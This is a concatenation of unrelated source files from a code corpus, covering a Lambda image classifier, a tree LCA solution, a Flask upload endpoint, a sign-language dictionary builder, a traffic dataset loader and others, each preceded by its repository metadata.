2, 8, 2, 6, 1, 10, 2, 5, 5, 2, 7, 7, 9, 4, 5, 10, 1, 5, 1, 9, 9, 1, 1,
7, 5, 5, 7, 10, 1, 10, 10, 7, 10, 1, 10, 10, 6, 2, 3, 3, 1, 10, 8, 8,
2, 3, 9, 10, 2, 2, 7, 7, 5, 10, 1, 7, 2, 6, 4, 4, 4, 4, 10, 10, 7, 5,
1, 8, 9, 7, 2, 1, 10, 9, 1, 9, 8, 4, 3, 8, 7, 2, 1, 9, 4, 2, 5, 4, 2,
5, 4, 6, 1, 1, 6, 5, 4, 10, 10, 4, 6, 4, 4, 5, 10, 2, 7, 6, 3, 6, 4, 2,
3, 6, 10, 4, 5, 7, 9, 8, 7, 1, 7, 9, 3, 3, 2, 4, 3, 7, 2, 6, 8, 9, 8,
7, 9, 9, 9, 9, 9, 7, 6, 1, 4, 5, 6, 5, 7, 1, 10, 1, 6, 9, 3, 2, 1, 4,
8, 10, 1, 1, 5, 7, 7, 4, 1, 3, 9, 5, 7, 9, 3, 7, 7, 1, 3, 7, 5, 1, 9,
3, 1, 2, 1, 9, 2, 4, 2, 4, 4, 7, 2, 1, 5, 8, 2, 9, 8, 2, 10, 1, 9, 6,
2, 6, 2, 8, 9, 5, 2, 4, 5, 2, 4, 1, 5, 10, 1, 3, 10, 9, 8, 2, 9, 4, 3,
9, 6, 5, 2, 1, 2, 4, 10, 2, 7, 2, 1, 4, 8, 7, 2, 8, 7, 6, 6, 8, 7, 8,
10, 8, 7, 5, 8, 9, 2, 9, 8, 5, 8, 4, 8, 3, 9, 5, 3, 6, 8, 1, 10, 10, 6,
9, 3, 7, 6, 8, 1, 8, 9, 7, 6, 6, 2, 1, 10, 7, 9, 7, 1, 9, 7, 2, 6, 10,
7, 6, 6, 1, 4, 6, 10, 4, 1, 9, 1, 8, 4, 2, 1, 9, 6, 1, 6, 9, 8, 1, 6,
1, 10, 10, 10, 8, 2, 3, 1, 6, 8, 8, 8, 5, 3, 5, 10, 6, 7, 3, 9, 9, 8,
2, 9, 3, 6, 8, 6, 1, 6, 1, 8, 2, 3, 7, 5, 7, 8, 1, 2, 3, 10, 10, 2, 3,
10, 4, 6, 7, 4, 2, 2, 2, 2, 4, 5, 5, 5, 1, 5, 7, 1, 1, 10, 6, 10, 9, 7,
4, 10, 1, 8, 8, 1, 1, 2, 2, 7, 6, 8, 3, 10, 10, 7, 6, 3, 5, 8, 9, 9, 6,
6, 3, 5, 9, 5, 7, 1, 2, 5, 7, 1, 2, 8, 2, 1, 8, 8, 7, 7, 8, 9, 9, 7, 2,
2, 4, 9, 5, 9, 7, 8, 6, 5, 7, 8, 2, 9, 6, 6, 3, 7, 3, 4, 8, 5, 10, 3,
1, 7, 10, 1, 8, 5, 9, 5, 9, 7, 3, 5, 2, 6, 2, 3, 6, 4, 3, 7, 6, 6, 5,
2, 2, 7, 9, 2, 10, 6, 8, 5, 1, 6, 8, 8, 3, 3, 9, 7, 6, 3, 10, 4, 2, 7,
10, 2, 3, 2, 7, 3, 5, 7, 2, 1, 8, 1, 4, 5, 9, 8, 2, 6, 3, 3, 4, 10, 7,
8, 5, 6, 2, 5, 9, 3, 1, 8, 1, 6, 1, 1, 7, 9, 1, 5, 2, 8, 3, 9, 1, 2, 9,
2, 4, 3, 4, 1, 4, 1, 2, 9, 1, 10, 7, 5, 8, 5, 10, 2, 2, 6, 3, 6, 7, 7,
6, 4, 5, 9, 5, 7, 8, 1, 9, 8, 6, 4, 1, 7, 5, 6, 7, 5, 4, 6, 8, 1, 8, 5,
5, 3, 1, 8, 9, 2, 1, 10, 2, 6, 9, 4, 3, 2, 9, 7, 2, 1, 5, 10, 2, 3, 8,
4, 8, 7, 9, 4, 8, 5, 7, 6, 6, 1, 10, 8, 3, 1, 3, 3, 9, 3, 4, 10, 3, 5,
7, 2, 8, 9, 8, 4, 6, 1, 4, 5, 8, 8, 10, 7, 2, 1, 7, 9, 9, 10, 3, 10, 5,
10, 7, 7, 8, 2, 9, 5, 4, 3, 8, 1, 3, 8, 8, 8, 5, 10, 7, 1, 6, 5, 10, 1,
1, 3, 4, 1, 6, 2, 10, 1, 8, 1, 5, 6, 9, 2, 10, 4, 6, 10, 8, 5, 3, 3, 9,
8, 5, 3, 1, 5, 4, 5, 4, 1, 3, 8, 1, 2, 9, 3, 2, 2, 8, 1, 2, 1, 10, 3,
3, 10
])
]
if __name__ == '__main__':
from utils import generate_csv
generate_csv(__file__, FIELDS, ROWS)
| 2.71875 | 3 |
matchvec/lambda_function.py | anisayari/matchvec | 1 | 12762236 | <reponame>anisayari/matchvec<filename>matchvec/lambda_function.py
from os import listdir, path, getenv
import json
import numpy as np
import cv2
import onnxruntime
from PIL import Image
import base64
from matchvec.process import predict_class, predict_objects
#from cgi import parse_header, parse_multipart
#from io import BytesIO
def lambda_handler_classification(event, context):
    """AWS Lambda handler: classify a base64-encoded image supplied in ``event['image']``.

    Returns an HTTP-style dict with status 200 and a JSON body containing the
    classification results (empty list when no image was supplied).
    """
    print("ENV", getenv('BACKEND'))
    print("ENV", getenv('DETECTION_THRESHOLD'))
    print("LISTDIR", listdir('/tmp'))
    res = list()
    body_str = event.get('image', None)
    # NOTE(review): leftover multipart/form-data parsing path, kept for reference.
    #c_type, c_data = parse_header(event['headers']['Content-Type'])
    #assert c_type == 'multipart/form-data'
    #decoded_string = base64.b64decode(event['body'])
    #form_data = parse_multipart(BytesIO(decoded_string), c_data)
    if body_str:
        print(type(body_str))
        print(body_str[:100])
        # read encoded image
        imageString = base64.b64decode(body_str)
        # convert binary data to numpy array
        nparr = np.frombuffer(imageString, np.uint8)
        # let opencv decode image to correct format
        img = cv2.imdecode(nparr, cv2.IMREAD_ANYCOLOR)
        res.append(predict_class(img))
    return {
        'statusCode': 200,
        'body': json.dumps(res)
    }
| 2.40625 | 2 |
src/data/902.py | NULLCT/LOMC | 0 | 12762237 | import sys
sys.setrecursionlimit(10000000)
class LowestCommonAncedtor:
    """Lowest-common-ancestor queries via an Euler tour + min segment tree (RMQ).

    Build is O(n log n); each query is O(log n).  The class name keeps the
    original spelling ("Ancedtor") so external references remain valid.
    """
    def __init__(self, G, root):
        # G: adjacency list of the tree; root: index of the root vertex.
        self.n = len(G)
        # Euler tour (2n-1 entries) and the depth at each tour position.
        self.tour = [0] * (2 * self.n - 1)
        self.depth_list = [0] * (2 * self.n - 1)
        # id[v] = first position of vertex v within the tour.
        self.id = [0] * self.n
        self.visit_id = 0
        # Recursive DFS; relies on the raised recursion limit at module top.
        self.dfs(G, root, -1, 0)
        self._rmq_init(self.depth_list)
    def _rmq_init(self, arr):
        """Build a min segment tree over ``arr`` (depths), padded with sentinel self.n."""
        n = len(arr)
        # N0: smallest power of two >= n (leaf count of the tree).
        self.N0 = 1 << (n - 1).bit_length()
        # self.n is a safe sentinel: every real depth is < n.
        self.dat = [self.n] * (self.N0 - 1) + arr + [self.n
                                                     ] * (self.N0 - n + 1)
        self.index = [0] * (self.N0 - 1) + list(
            range(n)) + [0] * (self.N0 - n + 1)
        dat = self.dat
        index = self.index
        # Fill internal nodes bottom-up; keep the index of the smaller child.
        for i in range(self.N0 - 2, -1, -1):
            if dat[2 * i + 1] > dat[2 * i + 2]:
                dat[i] = dat[2 * i + 2]
                index[i] = index[2 * i + 2]
            else:
                dat[i] = dat[2 * i + 1]
                index[i] = index[2 * i + 1]
    def _rmq_query(self, l, r):
        """Return the array index of the minimum value over the half-open range [l, r)."""
        l += self.N0
        r += self.N0
        s = self.n
        dat = self.dat
        index = self.index
        # Standard iterative segment-tree walk from the leaves upward.
        while l < r:
            if r & 1:
                r -= 1
                if s > dat[r - 1]:
                    s = dat[r - 1]
                    res = index[r - 1]
            if l & 1:
                if s > dat[l - 1]:
                    s = dat[l - 1]
                    res = index[l - 1]
                l += 1
            l >>= 1
            r >>= 1
        return res
    def dfs(self, G, vertex, parent, depth):
        """Record the Euler tour: visit ``vertex``, recurse, re-record on return."""
        self.id[vertex] = self.visit_id
        self.tour[self.visit_id] = vertex
        self.depth_list[self.visit_id] = depth
        self.visit_id += 1
        for element in G[vertex]:
            if element != parent:
                self.dfs(G, element, vertex, depth + 1)
                self.tour[self.visit_id] = vertex
                self.depth_list[self.visit_id] = depth
                self.visit_id += 1
    def get(self, u, v):
        """Return the lowest common ancestor of vertices u and v."""
        l, r = self.id[u], self.id[v]
        if r < l:
            l, r = r, l
        # LCA = shallowest vertex on the tour between the first occurrences.
        q = self._rmq_query(l, r + 1)
        return self.tour[q]
    def dist(self, u, v):
        """Return the number of edges on the path between vertices u and v."""
        lca = self.get(u, v)
        depth_u = self.depth_list[self.id[u]]
        depth_v = self.depth_list[self.id[v]]
        depth_lca = self.depth_list[self.id[lca]]
        return depth_u + depth_v - 2 * depth_lca
# Problem: for each query, report whether the distance between two vertices
# is odd ("Road") or even ("Town").
n, q = map(int, input().split())
e = [[] for _ in range(n)]
# Read the n-1 tree edges (1-indexed input -> 0-indexed adjacency list).
for _ in range(n - 1):
    a, b = map(int, input().split())
    a -= 1
    b -= 1
    e[a].append(b)
    e[b].append(a)
lca = LowestCommonAncedtor(e, 0)
# Answer each of the q distance-parity queries.
for _ in range(q):
    u, v = map(int, input().split())
    u -= 1
    v -= 1
    if lca.dist(u, v) % 2 == 1:
        print("Road")
    else:
        print("Town")
| 2.4375 | 2 |
demos/video_delete_all_rejected.py | Ziggeo/ZiggeoPythonSdk | 3 | 12762238 | <gh_stars>1-10
import sys
from Ziggeo import Ziggeo
# Require the API token and private key as positional CLI arguments.
if(len(sys.argv) < 3):
    print ("Error\n")
    print ("Usage: $>python video_delete_all_rejected.py YOUR_API_TOKEN YOUR_PRIVATE_KEY\n")
    sys.exit()
api_token = sys.argv[1]
private_key = sys.argv[2]
ziggeo = Ziggeo(api_token, private_key)
def indexVideos(skip=0):
    """Delete every REJECTED video, paging through the index 100 at a time.

    Recurses with ``skip + 100`` until an empty page is returned.

    NOTE(review): deleting videos may shift the server-side index while
    paging, so some rejected videos could be skipped — confirm against the
    Ziggeo API paging semantics (re-querying at skip=0 until empty may be
    the safer loop).
    """
    # Removed the unused local `yey` and the dead trailing `pass`.
    video_list = ziggeo.videos().index({"limit": 100, "skip": skip, "approved": "REJECTED"})
    for video in video_list:
        delete_video_token = video["token"]
        print("deleting video " + delete_video_token)
        ziggeo.videos().delete(delete_video_token)
    if len(video_list) > 0:
        indexVideos(skip + 100)
# Kick off deletion from the first page of results.
indexVideos(0)
| 2.875 | 3 |
interp/helpers.py | SvenPVoigt/data-science-demos | 0 | 12762239 | import h5py
import numpy as np
def load_data(fname):
    """Load the training arrays from an HDF5 file.

    Args:
        fname: path to an HDF5 file containing datasets 'X' and 'y'.

    Returns:
        tuple (X, y): X reshaped to a column vector (each row one data
        point), y as a 1-D array.
    """
    # Open read-only inside a context manager so the file handle is released
    # even on error (the original left the file open).
    with h5py.File(fname, 'r') as data_file:
        X = data_file['X'][:].reshape(-1, 1)  # each row is a data point
        y = data_file['y'][:]
    return X, y
def eval_fit(y_pred, y_true):
    """Return the (un-normalized) mean absolute error between predictions and targets."""
    absolute_errors = np.abs(y_pred - y_true)
    return np.mean(absolute_errors)
scdlbot/__init__.py | ninja8bpyt/scdlbot | 0 | 12762240 | # -*- coding: utf-8 -*-
"""Top-level package for Music Downloader Telegram Bot."""
__author__ = """@Bots_Ki_Duniya"""
# Non-standard metadata field: Telegram handle for bug reports.
__reportbugs__ = "@Mr_Ninjas_Bot"
__version__ = "0.13.7"
| 1.015625 | 1 |
src/media/itunes.py | sffjunkie/media | 0 | 12762241 | <filename>src/media/itunes.py
# Copyright (c) 2009-2014 <NAME> <<EMAIL>>
import os
from plistlib import PlistParser
from mogul.media.itc import ITCHandler
class iTunesLibrary(object):
    """Reader for an iTunes library plist file."""

    def __init__(self):
        # Parsed track data (populated externally; read() only returns the root).
        self.tracks = {}

    def read(self, filename):
        """Parse ``filename`` as a plist and return the parsed root object.

        The file handle is now closed deterministically; the original kept
        it open for the object's lifetime.

        NOTE(review): ``plistlib.PlistParser`` was removed in Python 3.9 —
        this module appears to target older Pythons; confirm before porting.
        """
        self.filename = filename
        self._parser = PlistParser()
        with open(filename) as fp:
            self._fp = fp
            root = self._parser.parse(fp)
        return root
class iTunesArtworkDatabase(object):
    """Lookup of iTunes album-artwork ITC files under an iTunes directory."""

    def __init__(self, itunes_dir=''):
        self.itunes_dir = itunes_dir

    def exists(self, library_id, persistent_id):
        """Return True if an ITC file for this track exists in Cache or Download."""
        paths = self.itc_paths(library_id, persistent_id)
        return os.path.exists(paths[0]) or os.path.exists(paths[1])

    def get_image(self, library_id, persistent_id, size=128):
        """Return the first image whose dimensions are within 5% of ``size``.

        Raises:
            IndexError: if no image of a matching size is found.
        """
        itc_file = ITCHandler()
        paths = self.itc_paths(library_id, persistent_id)
        try:
            itc_file.read(paths[0])
        except Exception:
            # Fall back to the Download location if the Cache copy is unreadable.
            itc_file.read(paths[1])

        found = None
        for image in itc_file.images:
            # Fixed: the original OR-ed complementary range checks, which was
            # always true, so the first image was returned regardless of size.
            # Accept only when BOTH dimensions are within 5% of the request.
            if abs(size - image.width) <= image.width / 20 and \
                    abs(size - image.height) <= image.height / 20:
                found = image
                break

        if found is not None:
            return found
        # Fixed: the original message contained an unfilled %d placeholder.
        raise IndexError('Image with size %d not found in ITC file' % size)

    def itc_paths(self, library_id, persistent_id):
        """Return the two candidate ITC paths (Cache, Download) for a track.

        The three final hex digits of the persistent id (reversed) become
        three two-digit decimal directory levels.
        """
        path = ''
        for ch in persistent_id[::-1][:3]:
            path = os.path.join(path, '%02d' % int(ch, 16))

        paths = [
            os.path.join(self.itunes_dir, 'Cache', library_id, path, '%s-%s.itc' % (library_id, persistent_id)),
            os.path.join(self.itunes_dir, 'Download', library_id, path, '%s-%s.itc' % (library_id, persistent_id))
        ]
        return paths
| 2.703125 | 3 |
cusg/blueprints/files.py | bigSAS/critical-usg-backend | 0 | 12762242 | <filename>cusg/blueprints/files.py
import os, pathlib
import uuid
from flask import Blueprint, request, send_from_directory
from werkzeug.utils import secure_filename
from cusg.utils.http import ok_response, ValidationError
from cusg.utils.permissions import restricted
files_blueprint = Blueprint('files', __name__)
# Image extensions accepted by the upload endpoint (compared lowercased).
ALLOWED_EXTENSIONS = ['png', 'jpg', 'jpeg', 'gif']
# Upload directory resolved relative to this module (../files next to the
# blueprints package); backslashes normalized for Windows paths.
UPLOAD_FOLDER = str(pathlib.Path(__file__).parent.absolute()).replace('\\', '/') + '/../files'
print('FILES UPLOAD FOLDER', UPLOAD_FOLDER)
@files_blueprint.route('/add', methods=('POST',))
@restricted(['ADMIN'])
def add_file():
    """Handle an admin file upload (multipart form field ``file``).

    Validates the extension against ALLOWED_EXTENSIONS, appends a short
    random suffix to avoid name collisions, sanitizes the name and stores
    the file in UPLOAD_FOLDER.

    NOTE(review): ``rsplit('.', 1)`` raises ValueError for filenames without
    a dot — confirm whether that case should raise ValidationError instead.
    """
    file = request.files.get('file', None)
    if not file: raise ValidationError('file is missing', 'file')
    filename, ext = tuple(file.filename.rsplit('.', 1))
    if ext.lower().strip() not in ALLOWED_EXTENSIONS:
        raise ValidationError('invalid file extension', 'file')
    # e.g. "photo" + "a1b2c3" + ".png" -> "photoa1b2c3.png"
    filename += f'{str(uuid.uuid4())[:7].replace("-", "")}.{ext}'
    filename = secure_filename(filename)
    file.save(os.path.join(UPLOAD_FOLDER, filename))
    return ok_response({'uploaded_filename': filename})
| 2.40625 | 2 |
tests/test_fitting_distance_on_text_collections.py | edepanaf/natural-language-processing | 0 | 12762243 | <gh_stars>0
import unittest
from fitting_distance_on_text_collections import *
from oracle_claim import OracleClaim
class TestFittingDistanceOnTextCollections(unittest.TestCase):
    """Unit tests for FittingDistanceOnTextCollections and its factor helpers."""
    def test_fit_of_fitting_distance_on_text_collections(self):
        """Fitting toward a smaller oracle distance must reduce the distance."""
        text0 = 'banana'
        text1 = 'ananas'
        text2 = 'bans'
        text_collection = {text0, text1, text2}
        distance = FittingDistanceOnTextCollections(text_collection)
        oracle_claim = OracleClaim(({text1}, {text2}), (0.1, 0.2))
        old_distance12 = distance({text1}, {text2})
        distance.fit({oracle_claim})
        new_distance12 = distance({text1}, {text2})
        self.assertTrue(old_distance12 > new_distance12)
    def test_distance_on_text_collections(self):
        """Distance between two collections evaluates to a float."""
        text0 = 'banana'
        text1 = 'ananas'
        text2 = 'bans'
        text_collection = {text0, text1, text2}
        distance = FittingDistanceOnTextCollections(text_collection)
        self.assertTrue(isinstance(distance({text0, text1}, {text1, text2}), float))
    def test_type_bag_of_factors_from_text(self):
        bag = bag_of_factors_from_text('wefwef')
        self.assertTrue(isinstance(bag, tuple))
    def test_bag_of_factors_from_text(self):
        """All factors up to length 3, with multiplicities, are produced.

        NOTE(review): the ``expected`` literal below repeats keys (e.g. ' '
        and 'c '); later entries overwrite earlier ones.  The original keys
        likely differed by whitespace runs — verify against the source repo.
        """
        text = 'ab c ab '
        bag = bag_of_factors_from_text(text, max_factor_length=3)
        expected = {'a': 2, 'ab': 2, 'ab ': 2, 'b': 2, 'b ': 2, 'b c': 1, ' ': 4, ' c': 1,
                    ' c ': 1, 'c': 1, 'c ': 1, 'c ': 1, ' ': 1, ' a': 1, ' a': 1, ' ab': 1}
        computed = dict()
        for factor in bag:
            computed[factor] = computed.get(factor, 0) + 1
        self.assertEqual(computed, expected)
    def test_clean_text(self):
        text = 'A;b_C'
        clean = 'a b c'
        self.assertEqual(clean_text(text), clean)
    def test_clean_letter(self):
        self.assertEqual(clean_letter('a'), 'a')
        self.assertEqual(clean_letter(','), ' ')
    def test_non_existent_weight_from_factor(self):
        """Factors absent from the collection weigh zero."""
        text0 = 'banana'
        text1 = 'ananas'
        text2 = 'bans'
        text_collection = {text0, text1, text2}
        distance = FittingDistanceOnTextCollections(text_collection)
        self.assertEqual(distance.weight_from_factor('wef'), 0.)
    def test_input_bag_dictionary(self):
        """Constructing from a bag->weight dict exposes those weights per text."""
        bag_to_weight = {'aa': 1., 'ab': 2., 'abc': 3.}
        distance = FittingDistanceOnTextCollections(bag_to_weight)
        self.assertEqual(distance.weight_from_text('aa'), 1.)
        self.assertEqual(distance.weight_from_text('ab'), 2.)
        self.assertEqual(distance.weight_from_text('abc'), 3.)
    def test_input_factor_dictionary(self):
        """Explicit factor weights apply only to factors present in the collection."""
        text0 = 'banana'
        text1 = 'ananas'
        text2 = 'bans'
        text_collection = {text0, text1, text2}
        factor_to_weight = {'a': 1., 'b': 2., 'ba': 3., 'c': 28.}
        distance = FittingDistanceOnTextCollections(text_collection, factor_to_weight=factor_to_weight)
        self.assertEqual(distance.weight_from_factor('a'), 1.)
        self.assertEqual(distance.weight_from_factor('ba'), 3.)
        self.assertEqual(distance.weight_from_factor('d'), 0.)
        self.assertEqual(distance.weight_from_factor('c'), 0.)
if __name__ == '__main__':
unittest.main()
| 2.5625 | 3 |
freelex.py | ackama/nzsl-dictionary-scripts | 2 | 12762244 | import sys
import os
import urllib.parse
import urllib.request
import xml.etree.ElementTree as ET
import shutil
import sqlite3
def fetch_database(filename):
    """Download the full Freelex XML dump and save it to ``filename``."""
    url = 'https://nzsl-assets.vuw.ac.nz/dnzsl/freelex/publicsearch?xmldump=1'
    # Close the HTTP response deterministically (the original leaked it).
    with urllib.request.urlopen(url) as r, open(filename, "wb") as f:
        f.write(r.read())
def fetch_assets(root):
    """Download every picture asset referenced by ``root`` that is missing on disk.

    Args:
        root: parsed Freelex XML tree (ElementTree root).
    """
    for entry in root.iter("entry"):
        print(entry.find("headword").text)
        for asset in entry.find("ASSET"):
            if "picture" != asset.tag:
                continue
            fn = os.path.join(asset.tag, asset.text)
            if os.path.exists(fn):
                continue
            # exist_ok replaces the original's try/except IOError race workaround.
            os.makedirs(os.path.dirname(fn), exist_ok=True)
            url = "https://nzsl-assets.vuw.ac.nz/dnzsl/freelex/assets/" + urllib.parse.quote(asset.text)
            # Close the HTTP response deterministically (the original leaked it).
            with urllib.request.urlopen(url) as r, open(fn, "wb") as f:
                f.write(r.read())
# Modify filenames to match the Android requirements (lowercase a-z and _ only)
# Since iOS uses the same data source (the .dat file), update iOS to use the same image names.
def normalize_image_filename(filename):
    """Return ``filename`` restricted to Android-safe characters.

    Lowercases, maps '-' to '_', and keeps only the final '.' (the extension
    separator) — every earlier '.' becomes '_'.
    """
    result = filename.lower().replace('-', '_')
    extra_dots = result.count('.') - 1
    if extra_dots > 0:
        result = result.replace('.', '_', extra_dots)
    return result
def rename_assets(root):
    """Rename picture files on disk to Android-safe names, updating ``root`` in place.

    The XML asset text is rewritten without the leading 'picture/' prefix.
    """
    for entry in root.iter("entry"):
        for asset in entry.find("ASSET"):
            if "picture" != asset.tag:
                continue
            old_filename = os.path.join(asset.tag, asset.text)
            if not os.path.isfile(old_filename):
                # Fixed: the original passed the filename as a second print()
                # argument, leaving the {} placeholder unfilled.
                print("Picture {} does not exist!".format(old_filename))
                continue
            new_filename = normalize_image_filename(old_filename)
            os.rename(old_filename, new_filename)
            asset.text = new_filename.replace('picture/', '', 1)
def write_datfile(root):
    """Write the tab-separated nzsl.dat dictionary file from the XML tree.

    Each line: glossmain, secondary gloss, Maori gloss, picture basename,
    mp4 video URL, handshape, location.  Missing optional fields become
    empty strings; missing assets are reported on stdout.
    """
    with open("nzsl.dat", "w") as f:
        for entry in root.iter("entry"):
            # NOTE(review): headword is a (id, text) tuple, used only in the
            # warning messages below — presumably intentional; confirm.
            headword = entry.attrib["id"], entry.find("headword").text
            sec = entry.find("glosssecondary")
            maori = entry.find("glossmaori")
            picture = entry.find("ASSET/picture")
            video = entry.find("ASSET/glossmain")
            handshape = entry.find("handshape")
            if picture is None:
                print("{} missing picture".format(headword))
            if video is None:
                print("{} missing video".format(headword))
            if handshape is None:
                print("{} missing handshape".format(headword))
            print("\t".join([
                entry.find("glossmain").text,
                sec.text if sec is not None else "",
                maori.text if maori is not None else "",
                os.path.basename(normalize_image_filename(picture.text)) if picture is not None else "",
                "https://nzsl-assets.vuw.ac.nz/dnzsl/freelex/assets/"+video.text.replace(".webm", ".mp4") if video is not None else "",
                handshape.text if handshape is not None else "",
                entry.find("location").text,
            ]), file=f)
def write_sqlitefile():
    """Build nzsl.db (SQLite) from the nzsl.dat file written by write_datfile.

    The extra ``target`` column concatenates normalised gloss/minor/maori
    fields ('|'-separated) as an ASCII-only search key.
    """
    if os.path.exists("nzsl.db"):
        os.unlink("nzsl.db")
    db = sqlite3.connect("nzsl.db")
    db.execute("create table words (gloss, minor, maori, picture, video, handshape, location, target)")
    with open("nzsl.dat") as f:
        for s in f:
            a = s.strip().split("\t")
            a.append("{}|{}|{}".format(normalise(a[0]), normalise(a[1]), normalise(a[2])))
            # The search key must be printable ASCII after normalisation.
            assert all(32 <= ord(x) < 127 for x in a[-1]), a[-1]
            db.execute("insert into words values (?, ?, ?, ?, ?, ?, ?, ?)", a)
    db.commit()
    db.close()
def copy_images_to_one_folder():
    """Collect all picture/<subdir>/*.png assets into a flat ``assets`` directory.

    Replaces the original ``os.system("cp ... 2>/dev/null")`` shell-out with
    portable glob + shutil (no shell dependency, no silent error suppression
    needed — an empty glob simply copies nothing).
    """
    import glob
    if os.path.isdir("assets"):
        shutil.rmtree("assets")
    os.makedirs("assets")
    for path in glob.glob(os.path.join("picture", "*", "*.png")):
        shutil.copy(path, "assets")
# Helper functions
def normalise(s):
    """Lowercase ``s`` and replace macron/accented vowels with plain ASCII."""
    return s.lower().translate(str.maketrans("āēéīōū", "aeeiou"))
| 2.875 | 3 |
SecondMost.py | KanagaSubramanian/PythonPrograms-frequent-Character- | 0 | 12762245 | inputstr="SecondMostFrequentCharacterInTheString"
safe=inputstr
countar=[]
count=0
for i in inputstr:
if(i!='#'):
countar.append(inputstr.count(i))
print(i,inputstr.count(i),end=", ")
inputstr=inputstr.replace(i,'#')
else:
continue
firstmax=max(countar)
countar.remove(max(countar))
maxnum=max(countar)
print()
if(firstmax==maxnum):
for i in safe:
if(maxnum==safe.count(i)):
count+=1
if(count==2):
print(i,maxnum)
break
else:
for i in safe:
if(maxnum==safe.count(i)):
print(i,maxnum)
break
| 3.4375 | 3 |
setup.py | 2020ai/tweetDetective_DataScience | 0 | 12762246 | from setuptools import find_packages, setup
# Packaging metadata for the `src` package (tweet analyzer project).
setup(
    name='src',
    packages=find_packages(),
    version='0.1.0',
    description='tweet analyzer',
    author='<NAME>',
    license='',
)
| 1.0625 | 1 |
libcity/data/dataset/cstn_dataset.py | moghadas76/test_bigcity | 221 | 12762247 | <reponame>moghadas76/test_bigcity
import os
import numpy as np
from libcity.data.dataset import TrafficStateGridOdDataset
from libcity.data.utils import generate_dataloader
from libcity.utils import ensure_dir
class CSTNDataset(TrafficStateGridOdDataset):
    def __init__(self, config):
        """Initialize the grid-OD dataset and declare the (X, W, y) feature layout."""
        super().__init__(config)
        # X: main input, W: external input (e.g. weather), y: prediction target.
        self.feature_name = {'X': 'float', 'W': 'float', 'y': 'float'}
def _generate_ext_data(self, ext_data):
num_samples = ext_data.shape[0]
offsets = np.sort(np.concatenate((np.arange(-self.input_window - self.output_window + 1, 1, 1),)))
min_t = abs(min(offsets))
max_t = abs(num_samples - abs(max(offsets)))
W = []
for t in range(min_t, max_t):
W_t = ext_data[t + offsets, ...]
W.append(W_t)
W = np.stack(W, axis=0)
return W
def _generate_data(self):
"""
加载数据文件(.gridod)和外部数据(.ext),以X, W, y的形式返回
Returns:
tuple: tuple contains:
X(np.ndarray): 模型输入数据,(num_samples, input_length, ..., feature_dim) \n
W(np.ndarray): 模型外部数据,(num_samples, input_length, ext_dim)
y(np.ndarray): 模型输出数据,(num_samples, output_length, ..., feature_dim)
"""
# 处理多数据文件问题
if isinstance(self.data_files, list):
data_files = self.data_files.copy()
else:
data_files = [self.data_files].copy()
# 加载外部数据
ext_data = self._load_ext() # (len_time, ext_dim)
W = self._generate_ext_data(ext_data)
# 加载基本特征数据
X_list, y_list = [], []
for filename in data_files:
df = self._load_dyna(filename) # (len_time, ..., feature_dim)
X, y = self._generate_input_data(df)
# x: (num_samples, input_length, input_dim)
# y: (num_samples, output_length, ..., output_dim)
X_list.append(X)
y_list.append(y)
X = np.concatenate(X_list)
y = np.concatenate(y_list)
df = self._load_dyna(data_files[0]).squeeze()
self._logger.info("Dataset created")
self._logger.info("X shape: {}, W shape: {}, y shape: ".format(str(X.shape), str(W.shape), y.shape))
return X, W, y
def _split_train_val_test(self, X, W, y):
test_rate = 1 - self.train_rate - self.eval_rate
num_samples = X.shape[0]
num_test = round(num_samples * test_rate)
num_train = round(num_samples * self.train_rate)
num_eval = num_samples - num_test - num_train
# train
x_train, w_train, y_train = X[:num_train], W[:num_train], y[:num_train]
# eval
x_eval, w_eval, y_eval = X[num_train: num_train + num_eval], \
W[num_train: num_train + num_eval], y[num_train: num_train + num_eval]
# test
x_test, w_test, y_test = X[-num_test:], W[-num_test:], y[-num_test:]
# log
self._logger.info(
"train\tX: {}, W: {}, y: {}".format(str(x_train.shape), str(w_train.shape), str(y_train.shape)))
self._logger.info("eval\tX: {}, W: {}, y: {}".format(str(x_eval.shape), str(w_eval.shape), str(y_eval.shape)))
self._logger.info("test\tX: {}, W: {}, y: {}".format(str(x_test.shape), str(w_test.shape), str(y_test.shape)))
return x_train, w_train, y_train, x_eval, w_eval, y_eval, x_test, w_test, y_test
def _load_cache_train_val_test(self):
self._logger.info('Loading ' + self.cache_file_name)
cat_data = np.load(self.cache_file_name)
x_train, w_train, y_train, x_eval, w_eval, y_eval, x_test, w_test, y_test = \
cat_data['x_train'], cat_data['w_train'], cat_data['y_train'], cat_data['x_eval'], cat_data['w_eval'], \
cat_data['y_eval'], cat_data['x_test'], cat_data['w_test'], cat_data['y_test']
self._logger.info(
"train\tX: {}, W: {}, y: {}".format(str(x_train.shape), str(w_train.shape), str(y_train.shape)))
self._logger.info("eval\tX: {}, W: {}, y: {}".format(str(x_eval.shape), str(w_eval.shape), str(y_eval.shape)))
self._logger.info("test\tX: {}, W: {}, y: {}".format(str(x_test.shape), str(w_test.shape), str(y_test.shape)))
return x_train, w_train, y_train, x_eval, w_eval, y_eval, x_test, w_test, y_test
def _generate_train_val_test(self):
X, W, y = self._generate_data()
x_train, w_train, y_train, x_eval, w_eval, y_eval, x_test, w_test, y_test = self._split_train_val_test(X, W, y)
if self.cache_dataset:
ensure_dir(self.cache_file_folder)
np.savez_compressed(
self.cache_file_name,
x_train=x_train,
w_train=w_train,
y_train=y_train,
x_test=x_test,
w_test=w_test,
y_test=y_test,
x_eval=x_eval,
w_eval=w_eval,
y_eval=y_eval,
)
self._logger.info('Saved at ' + self.cache_file_name)
return x_train, w_train, y_train, x_eval, w_eval, y_eval, x_test, w_test, y_test
def get_data(self):
# 加载数据集
x_train, w_train, y_train, x_eval, w_eval, y_eval, x_test, w_test, y_test = [], [], [], [], [], [], [], [], []
if self.data is None:
if self.cache_dataset and os.path.exists(self.cache_file_name):
x_train, w_train, y_train, x_eval, w_eval, y_eval, x_test, w_test, y_test = self._load_cache_train_val_test()
else:
x_train, w_train, y_train, x_eval, w_eval, y_eval, x_test, w_test, y_test = self._generate_train_val_test()
# 数据归一化
self.feature_dim = x_train.shape[-1]
self.ext_dim = w_train.shape[-1]
self.scaler = self._get_scalar(self.scaler_type, x_train, y_train)
x_train[..., :self.output_dim] = self.scaler.transform(x_train[..., :self.output_dim])
w_train[..., :self.output_dim] = self.scaler.transform(w_train[..., :self.output_dim])
y_train[..., :self.output_dim] = self.scaler.transform(y_train[..., :self.output_dim])
x_eval[..., :self.output_dim] = self.scaler.transform(x_eval[..., :self.output_dim])
w_eval[..., :self.output_dim] = self.scaler.transform(w_eval[..., :self.output_dim])
